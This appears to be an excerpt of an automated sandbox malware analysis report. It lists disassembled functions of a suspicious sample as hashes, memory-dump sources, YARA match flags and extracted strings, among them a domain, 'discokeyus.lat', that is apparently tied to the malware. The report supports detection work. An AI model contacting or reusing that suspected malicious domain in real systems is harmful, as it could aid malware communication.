                                  • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                  • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                  • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                  • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Ef$TQ][$sWK)
                                  • API String ID: 0-3401374238
                                  • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                  • Instruction ID: 0673d08cc30abf38c79ff4483970072694cc2bc85c395f7e070f13dbf7cb8a32
                                  • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                  • Instruction Fuzzy Hash: 34B1E13051D3D08ED739CF2994907ABBBE1AFA7304F08499CD4D95B282D775854ACB63
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Ef$TQ][$sWK)
                                  • API String ID: 0-3401374238
                                  • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                  • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                  • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                  • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +|-~$/pqr$_
                                  • API String ID: 0-1379640984
                                  • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                  • Instruction ID: 96c22547e2ac084dbf55f9bd646db114f1f55f2635be4050717083e5b5dba92d
                                  • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                  • Instruction Fuzzy Hash: 88814C5561458006DB2CDF3888A373BBAD29FC4308B2991BEC955CFBA7E938C542874D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +|-~$/pqr$_
                                  • API String ID: 0-1379640984
                                  • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                  • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                  • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                  • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$GetProcAddress.$l
                                  • API String ID: 0-2784972518
                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction ID: 774b5c753e7839d28e09a53af81115492fabee51f0db2564976ecef852ba92f6
                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                  • Instruction Fuzzy Hash: 44316EB6900609DFDB10CF99C880AADBBF9FF48324F54404AD541A7352D7B5EA85CFA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: NDNK$WJeX$X
                                  • API String ID: 0-3631875968
                                  • Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                  • Instruction ID: 8bf002d4ef67dda19a06bb4db384d26f055afc84cf3aeea84c777ced1b50a826
                                  • Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                  • Instruction Fuzzy Hash: 7101BCB091D7908FD3B19F259859B9FBFE4ABD2310F20492CC5D9AA211DA3688008B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "51s$9YB
                                  • API String ID: 0-2722061943
                                  • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                  • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                  • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                  • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !@$,
                                  • API String ID: 0-2321553346
                                  • Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                  • Instruction ID: da856743d013832ee0796312294be7cc74877946edc56bf1f10f60c98fdece2d
                                  • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                  • Instruction Fuzzy Hash: 8342F5B1E042548FDB04CF78C8853EEBFF1AF49310F198269D995AB391D7398985CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !@$,
                                  • API String ID: 0-2321553346
                                  • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                  • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                  • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                  • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Dx$discokeyus.lat
                                  • API String ID: 0-1480405892
                                  • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                  • Instruction ID: ff7cfd7f880d1f49d657f119c412b84c3fcd64cd8114fb7c588cc347aad53cf1
                                  • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                  • Instruction Fuzzy Hash: 4FF1CBB050D3D18ED335CF658494BEBBFE1AB92314F184AADC8D95B652C735090ACB93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Dx$discokeyus.lat
                                  • API String ID: 0-1480405892
                                  • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                  • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                  • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                  • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0K)$4*VP
                                  • API String ID: 0-3626284114
                                  • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                  • Instruction ID: a899ead5a4bab7f9f314e814cd4c8141f45f9e1155f27fc69ed790be99b7c153
                                  • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                  • Instruction Fuzzy Hash: 6DD1153051D3D08ED725CB3988517EBBBE19FA7314F188AADD4C98B382D7758846CB62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0K)$4*VP
                                  • API String ID: 0-3626284114
                                  • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                  • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                  • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                  • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: R2B$6B
                                  • API String ID: 0-20043878
                                  • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                  • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                  • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                  • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: XG$|}
                                  • API String ID: 0-1014376750
                                  • Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                  • Instruction ID: cecb1e3d512eba40b1ac8453edad98ef12894d078ae2e1dd0ac9dcfcafbb9b6d
                                  • Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                  • Instruction Fuzzy Hash: 50D102B15087448BD724CF18C8927ABB7F2EFD2354F09891CE6968B3A1E7799841CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XG$|}
                                  • API String ID: 0-1014376750
                                  • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                  • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                  • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                  • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )$IEND
                                  • API String ID: 0-707183367
                                  • Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                  • Instruction ID: bb4d7b90872b3d777b652f48ae69db2f2cb27f6f7f8dd6e9fc5c0d94baf70e07
                                  • Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                  • Instruction Fuzzy Hash: 6FD1B1B16083489FD720DF18C841BABBBE4EF94304F14492DFA999B381D775E948CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: )$IEND
                                  • API String ID: 0-707183367
                                  • Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                  • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                  • Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                  • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: i$r}A
                                  • API String ID: 2994545307-2976846027
                                  • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                  • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                  • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                  • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d$d
                                  • API String ID: 0-195624457
                                  • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                  • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                  • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                  • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P<?$P<?
                                  • API String ID: 0-3449142988
                                  • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                  • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                  • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                  • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: f
                                  • API String ID: 2994545307-1993550816
                                  • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                  • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                  • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                  • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                  • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                  • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                  • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                  • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                  • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                  • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                  • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                  • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                  • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                  • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                  • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                  • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: jk
                                  • API String ID: 0-78326018
                                  • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                  • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                  • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                  • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: bC
                                  • API String ID: 0-3681614764
                                  • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                  • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                  • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                  • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {}
                                  • API String ID: 0-4269290415
                                  • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                  • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                  • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                  • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "
                                  • API String ID: 0-123907689
                                  • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                  • Instruction ID: a478cc777a690a7ec93d8b08d99d54574c879e98b69807f8ba98b8f0895718db
                                  • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                  • Instruction Fuzzy Hash: 89D1E2726083555FC714CF24C8907EBBBE6AFC5310F198A2DE8A98B281D735DD84C7A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "
                                  • API String ID: 0-123907689
                                  • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                  • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                  • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                  • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
